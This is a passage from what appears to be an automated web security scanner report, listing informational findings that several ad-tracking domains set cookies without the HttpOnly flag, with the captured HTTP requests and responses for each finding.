Set-Cookie: aud=ABR4nGNgYGDwXRDkzMDAqG%2FlGH6aQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAMoBPVM%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:11 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyPn%2F99jjDAyM%2BlaO4adBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2FtPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBrALb1; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:11 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.76. http://bcp.crwdcntrl.net/4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBswcDAqG%2FlKsrBoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPALT0PEg%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2OL%2F95hLDAyM%2BlauohwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2VIOrL7cNAipmBgecnA98vBh5lAQcmoNL%2F38FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoKVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAD7RrWB

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:23 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBsz8DAqG%2FlqneZQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKdJPTM%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:23 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2P7%2F95jTDAyM%2BlauepdBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA%2B9PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQDJArZm; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:23 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.77. http://bcp.crwdcntrl.net/4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:16:09 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAjycDAqG%2BVfkSDQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAKFrPSM%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:09 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgRvL%2F9%2BCPDAyM%2BlbpRzRAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvNIOrL7blAipmBQeQnA98vBh5lAQcmoNL%2FF8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1ioHi7EKLRpB7JGRrAqF7gqEJ%2BBS6ZOHb%2BTA3j34VcQuIgZvwKu1kkEFNQ34FfA%2BXg5fgXcCbsIKdiJXwFfxVv8CmTNLuJXAACxmbIG; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:09 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.78. http://bcp.crwdcntrl.net/4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC8lIGBUd%2FKba8NgzoDg4BSA0MDULwXTIluA1M8l8GU4FcwxcsMEbwJUbIfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg5MCRyHqKwGU0LPIIa5QZwbAREshug7BOGVQFz2HuLqfxDt%2BhCeKUTfAYhz%2FYE8ABzsPZI%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOn%2F7zGpDAyM%2BlZue21AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvLQdSX2weBFDMDg8BPBr5fDDzKAg5MQKX%2Fv4KVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQYrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQCJaLYm

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:59:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBhysDAqG8V0V%2FMoM7AIKDUwNAAFO8FUzyXwZToNjAl%2BBVM8TJD5G5C5PZDBKUhvIUQahFECR%2BEl8UAAlyPIbx0CJUIoRLAFP9fMMXGC6Y4jMCUsBmY4poB1s4nCtEgDKZEzkGUVIMpgeMQU9zAlNAziHMjILxiiL5DEF4JxGXvIdr1IY7%2FB6FMIfoOQJzrD%2BQBALfZPUI%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:33 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgwvT%2F9%2FCrDAyM%2BlYR%2FcUgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0pIOrL7XVAipmBQfAnA98vBh5lAQcmoNL%2Fj8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoAlyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACgfrQI; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:33 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.79. http://bcp.crwdcntrl.net/4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRA8kYGBUd%2FKraCbQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAP0hPYA%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOL%2F7zGVDAyM%2BlZuBd0gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0VIOrL7UNAipmBgf8nA98vBh5lAQcmoNL%2F38BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoCVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACnk7ZF

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:40:05 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC8lIGBUd%2FKba8NgzoDg4BSA0MDULwXTIluA1M8l8GU4FcwxcsMEbwJUbIfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg5MCRyHqKwGU0LPIIa5QZwbAREshug7BOGVQFz2HuLqfxDt%2BhCeKUTfAYhz%2FYE8ABzsPZI%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:40:05 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOn%2F7zGpDAyM%2BlZue21AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvLQdSX2weBFDMDg8BPBr5fDDzKAg5MQKX%2Fv4KVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQYrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQCJaLYm; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:40:05 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.80. http://bcp.crwdcntrl.net/4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBhysDAqG8V0V%2FMoM7AIKDUwNAAFO8FUzyXwZToNjAl%2BBVM8TJD5G5C5PZDBKUhvIUQahFECR%2BEl8UAAlyPIbx0CJUIoRLAFP9fMMXGC6Y4jMCUsBmY4poB1s4nCtEgDKZEzkGUVIMpgeMQU9zAlNAziHMjILxiiL5DEF4JxGXvIdr1IY7%2FB6FMIfoOQJzrD%2BQBALfZPUI%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgwvT%2F9%2FCrDAyM%2BlYR%2FcUgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0pIOrL7XVAipmBQfAnA98vBh5lAQcmoNL%2Fj8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoAlyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACgfrQI

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:59:50 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:50 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:50 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
6.81. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=4608069584519221037 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:41:20 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535461.4608069584519221037.0|531292.CG-00000001131071922.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.1; Domain=.contextweb.com; Expires=Tue, 10-Apr-2012 16:41:20 GMT
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
6.82. http://bh.contextweb.com/bh/sync/admeld  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 162
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');
6.83. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=3;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=73786992-c1ac-4ae0-ab08-95828826c2953Hu01g; A3=iVGCazDb02Hn00002h6GXaxsD0czK00000idb7axqo02Hn00000iryraz5F09Fl0000aidb8axqo02Hn00000h6H6axsD0czK00000izcpayfZ0bnA00001iGeHaztg0bBg00001hZiFayN607xf00000hRzPazYC07tg00001iVEMazDb02Hn00001iVF7aztg02Hn00001iKJmayXi07Nz00001ieWcaxuC035P00000hGtnaxCA0bKd00001gy4faxT809wy0000ki9lAaxCA0bKd00003hRzOazYy07tg00001iznKax6T0bI400001iRc1az5S0cba00001hUeBaxLG0cdw00001iBoWax1n06UE00001iGxeaxBP07pd00001i9lUaxwP0bKd00001htT2ax2d07aw00001iwN7az7I0czK0000chVoJawTt0bKd00004hUeyaxqd0cdw00001imVBayg20cEt00001b2Xeayce04m400000hGteaxw50bKd00001hVo4axCA0bKd00003hGtDaxxL0bKd00005iBlzaxwY06UE00001iwZ+azjI0czK00005gx4UayXj09wy00002gy4daxKP09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; B3=97pN0000000001t.8Tjz0000000000tX8KY10000000000t.8dnC0000000002u28P920000000001tV8HLo0000000005tY8Qvs0000000003tY95u+0000000001tU6Yf50000000001tU8Jbw0000000004tV93Np0000000001tW8Swk0000000005tX8nf80000000000tX8B100000000001tY9ajg0000000001u08nf90000000000tX8ZIR0000000002tV8V.x0000000001tZ92de0000000002tW8Jbt0000000003tY8QDY0000000001u193Nl0000000001tX8SBq0000000001tZ8B0.0000000001tX8TZe000000000au09br40000000001u19br30000000001u15J3v0000000000tZ8Qvv0000000001tX8B120000000005tX9br20000000002u184hv0000000002t.8Ykb0000000001tZ8WhH0000000001tV9c2I000000000hu086Y60000000001tW8Swi0000000000tX95uB0000000001tX8Swj0000000000tX851k000000000mtY

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
